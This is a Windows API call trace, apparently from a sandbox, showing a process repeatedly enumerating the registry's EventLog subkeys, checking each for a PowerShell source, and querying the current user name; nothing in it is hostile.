	[0120.493] RegQueryInfoKeyW (in: hKey=0x638, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xd7edd8aa8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xd7edd8aa8c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.493] CoTaskMemFree (pv=0x0) 
	[0120.493] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b2e0
	[0120.493] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x0, lpName=0x2ad2069b2e0, lpcchName=0xd7edd8ab18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xd7edd8ab18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.493] CoTaskMemFree (pv=0x2ad2069b2e0) 
	[0120.493] CoTaskMemFree (pv=0x0) 
	[0120.493] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b910
	[0120.493] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x1, lpName=0x2ad2069b910, lpcchName=0xd7edd8ab18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xd7edd8ab18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.493] CoTaskMemFree (pv=0x2ad2069b910) 
	[0120.493] CoTaskMemFree (pv=0x0) 
	[0120.494] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e670
	[0120.494] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x2, lpName=0x2ad2069e670, lpcchName=0xd7edd8ab18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xd7edd8ab18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.494] CoTaskMemFree (pv=0x2ad2069e670) 
	[0120.494] CoTaskMemFree (pv=0x0) 
	[0120.494] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.494] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x3, lpName=0x2ad2069dc20, lpcchName=0xd7edd8ab18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xd7edd8ab18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.494] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.494] CoTaskMemFree (pv=0x0) 
	[0120.494] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b910
	[0120.494] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x4, lpName=0x2ad2069b910, lpcchName=0xd7edd8ab18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xd7edd8ab18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.494] CoTaskMemFree (pv=0x2ad2069b910) 
	[0120.494] CoTaskMemFree (pv=0x0) 
	[0120.494] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.494] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x5, lpName=0x2ad2069dc20, lpcchName=0xd7edd8ab18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xd7edd8ab18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.494] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.494] CoTaskMemFree (pv=0x0) 
	[0120.494] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b2e0
	[0120.494] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x6, lpName=0x2ad2069b2e0, lpcchName=0xd7edd8ab18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xd7edd8ab18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.494] CoTaskMemFree (pv=0x2ad2069b2e0) 
	[0120.494] CoTaskMemFree (pv=0x0) 
	[0120.494] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b4f0
	[0120.494] RegEnumKeyExW (in: hKey=0x638, dwIndex=0x7, lpName=0x2ad2069b4f0, lpcchName=0xd7edd8ab18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xd7edd8ab18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.494] CoTaskMemFree (pv=0x2ad2069b4f0) 
	[0120.494] CoTaskMemFree (pv=0x0) 
	[0120.494] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x648) returned 0x0
	[0120.495] RegOpenKeyExW (in: hKey=0x648, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x0) returned 0x2
	[0120.495] RegOpenKeyExW (in: hKey=0x638, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x64c) returned 0x0
	[0120.495] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x0) returned 0x2
	[0120.495] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x650) returned 0x0
	[0120.495] RegOpenKeyExW (in: hKey=0x650, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x0) returned 0x2
	[0120.495] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x654) returned 0x0
	[0120.496] RegOpenKeyExW (in: hKey=0x654, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x0) returned 0x2
	[0120.496] RegOpenKeyExW (in: hKey=0x638, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x658) returned 0x0
	[0120.496] RegOpenKeyExW (in: hKey=0x658, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x0) returned 0x2
	[0120.496] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x0) returned 0x5
	[0120.544] RegOpenKeyExW (in: hKey=0x638, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x65c) returned 0x0
	[0120.544] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x0) returned 0x2
	[0120.544] RegOpenKeyExW (in: hKey=0x638, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x660) returned 0x0
	[0120.544] RegOpenKeyExW (in: hKey=0x660, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab78 | out: phkResult=0xd7edd8ab78*=0x664) returned 0x0
	[0120.545] RegCloseKey (hKey=0x664) returned 0x0
	[0120.545] RegCloseKey (hKey=0x638) returned 0x0
	[0120.546] RegCloseKey (hKey=0x660) returned 0x0
	[0120.567] CoTaskMemAlloc (cb=0x804) returned 0x2ad22d3a700
	[0120.567] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2ad22d3a700, nSize=0xd7edd8ad88 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0xd7edd8ad88) returned 0x1
	[0120.568] CoTaskMemFree (pv=0x2ad22d3a700) 
	[0120.569] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.569] GetUserNameW (in: lpBuffer=0x2ad2069dc20, pcbBuffer=0xd7edd8adc8 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7edd8adc8) returned 1
	[0120.569] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.688] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aac8 | out: phkResult=0xd7edd8aac8*=0x660) returned 0x0
	[0120.688] RegQueryInfoKeyW (in: hKey=0x660, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xd7edd8aa3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xd7edd8aa3c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x0) 
	[0120.688] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.688] RegEnumKeyExW (in: hKey=0x660, dwIndex=0x0, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.688] CoTaskMemFree (pv=0x0) 
	[0120.688] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b2e0
	[0120.688] RegEnumKeyExW (in: hKey=0x660, dwIndex=0x1, lpName=0x2ad2069b2e0, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x2ad2069b2e0) 
	[0120.688] CoTaskMemFree (pv=0x0) 
	[0120.688] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b4f0
	[0120.688] RegEnumKeyExW (in: hKey=0x660, dwIndex=0x2, lpName=0x2ad2069b4f0, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x2ad2069b4f0) 
	[0120.688] CoTaskMemFree (pv=0x0) 
	[0120.688] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b2e0
	[0120.688] RegEnumKeyExW (in: hKey=0x660, dwIndex=0x3, lpName=0x2ad2069b2e0, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x2ad2069b2e0) 
	[0120.688] CoTaskMemFree (pv=0x0) 
	[0120.688] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069de30
	[0120.688] RegEnumKeyExW (in: hKey=0x660, dwIndex=0x4, lpName=0x2ad2069de30, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x2ad2069de30) 
	[0120.688] CoTaskMemFree (pv=0x0) 
	[0120.688] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.688] RegEnumKeyExW (in: hKey=0x660, dwIndex=0x5, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.688] CoTaskMemFree (pv=0x0) 
	[0120.688] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.688] RegEnumKeyExW (in: hKey=0x660, dwIndex=0x6, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.688] CoTaskMemFree (pv=0x0) 
	[0120.688] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.688] RegEnumKeyExW (in: hKey=0x660, dwIndex=0x7, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.688] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.689] CoTaskMemFree (pv=0x0) 
	[0120.689] RegOpenKeyExW (in: hKey=0x660, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x638) returned 0x0
	[0120.689] RegOpenKeyExW (in: hKey=0x638, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.689] RegOpenKeyExW (in: hKey=0x660, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x664) returned 0x0
	[0120.689] RegOpenKeyExW (in: hKey=0x664, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.689] RegOpenKeyExW (in: hKey=0x660, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x668) returned 0x0
	[0120.690] RegOpenKeyExW (in: hKey=0x668, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.690] RegOpenKeyExW (in: hKey=0x660, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x66c) returned 0x0
	[0120.690] RegOpenKeyExW (in: hKey=0x66c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.690] RegOpenKeyExW (in: hKey=0x660, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x670) returned 0x0
	[0120.690] RegOpenKeyExW (in: hKey=0x670, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.691] RegOpenKeyExW (in: hKey=0x660, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x5
	[0120.698] RegOpenKeyExW (in: hKey=0x660, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x674) returned 0x0
	[0120.698] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.698] RegOpenKeyExW (in: hKey=0x660, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x678) returned 0x0
	[0120.698] RegOpenKeyExW (in: hKey=0x678, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x67c) returned 0x0
	[0120.698] RegCloseKey (hKey=0x67c) returned 0x0
	[0120.698] RegCloseKey (hKey=0x660) returned 0x0
	[0120.699] RegCloseKey (hKey=0x678) returned 0x0
	[0120.700] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aac8 | out: phkResult=0xd7edd8aac8*=0x678) returned 0x0
	[0120.700] RegQueryInfoKeyW (in: hKey=0x678, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xd7edd8aa3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xd7edd8aa3c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.700] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e670
	[0120.700] RegEnumKeyExW (in: hKey=0x678, dwIndex=0x0, lpName=0x2ad2069e670, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x2ad2069e670) 
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.700] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.700] RegEnumKeyExW (in: hKey=0x678, dwIndex=0x1, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.700] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.700] RegEnumKeyExW (in: hKey=0x678, dwIndex=0x2, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.700] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b2e0
	[0120.700] RegEnumKeyExW (in: hKey=0x678, dwIndex=0x3, lpName=0x2ad2069b2e0, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x2ad2069b2e0) 
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.700] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.700] RegEnumKeyExW (in: hKey=0x678, dwIndex=0x4, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.700] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0120.700] RegEnumKeyExW (in: hKey=0x678, dwIndex=0x5, lpName=0x2ad2069e460, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x2ad2069e460) 
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.700] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0120.700] RegEnumKeyExW (in: hKey=0x678, dwIndex=0x6, lpName=0x2ad2069e460, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x2ad2069e460) 
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.700] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069e460
	[0120.700] RegEnumKeyExW (in: hKey=0x678, dwIndex=0x7, lpName=0x2ad2069e460, lpcchName=0xd7edd8aac8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xd7edd8aac8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.700] CoTaskMemFree (pv=0x2ad2069e460) 
	[0120.700] CoTaskMemFree (pv=0x0) 
	[0120.701] RegOpenKeyExW (in: hKey=0x678, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x660) returned 0x0
	[0120.701] RegOpenKeyExW (in: hKey=0x660, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.701] RegOpenKeyExW (in: hKey=0x678, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x67c) returned 0x0
	[0120.701] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.701] RegOpenKeyExW (in: hKey=0x678, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x680) returned 0x0
	[0120.702] RegOpenKeyExW (in: hKey=0x680, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.702] RegOpenKeyExW (in: hKey=0x678, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x684) returned 0x0
	[0120.702] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.702] RegOpenKeyExW (in: hKey=0x678, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x688) returned 0x0
	[0120.702] RegOpenKeyExW (in: hKey=0x688, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.703] RegOpenKeyExW (in: hKey=0x678, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x5
	[0120.709] RegOpenKeyExW (in: hKey=0x678, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x68c) returned 0x0
	[0120.709] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x0) returned 0x2
	[0120.709] RegOpenKeyExW (in: hKey=0x678, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x690) returned 0x0
	[0120.709] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8ab28 | out: phkResult=0xd7edd8ab28*=0x694) returned 0x0
	[0120.709] RegCloseKey (hKey=0x694) returned 0x0
	[0120.709] RegCloseKey (hKey=0x678) returned 0x0
	[0120.710] RegCloseKey (hKey=0x690) returned 0x0
	[0120.711] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8aa98 | out: phkResult=0xd7edd8aa98*=0x690) returned 0x0
	[0120.711] RegQueryInfoKeyW (in: hKey=0x690, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xd7edd8aa0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xd7edd8aa0c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xd7edd8aa08*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.711] CoTaskMemFree (pv=0x0) 
	[0120.711] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.711] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x0, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aa98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xd7edd8aa98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.711] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.711] CoTaskMemFree (pv=0x0) 
	[0120.711] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0120.711] RegEnumKeyExW (in: hKey=0x690, dwIndex=0x1, lpName=0x2ad2069dc20, lpcchName=0xd7edd8aa98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xd7edd8aa98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0120.711] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0120.711] CoTaskMemFree (pv=0x0) 
	[0120.711] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069b2e0
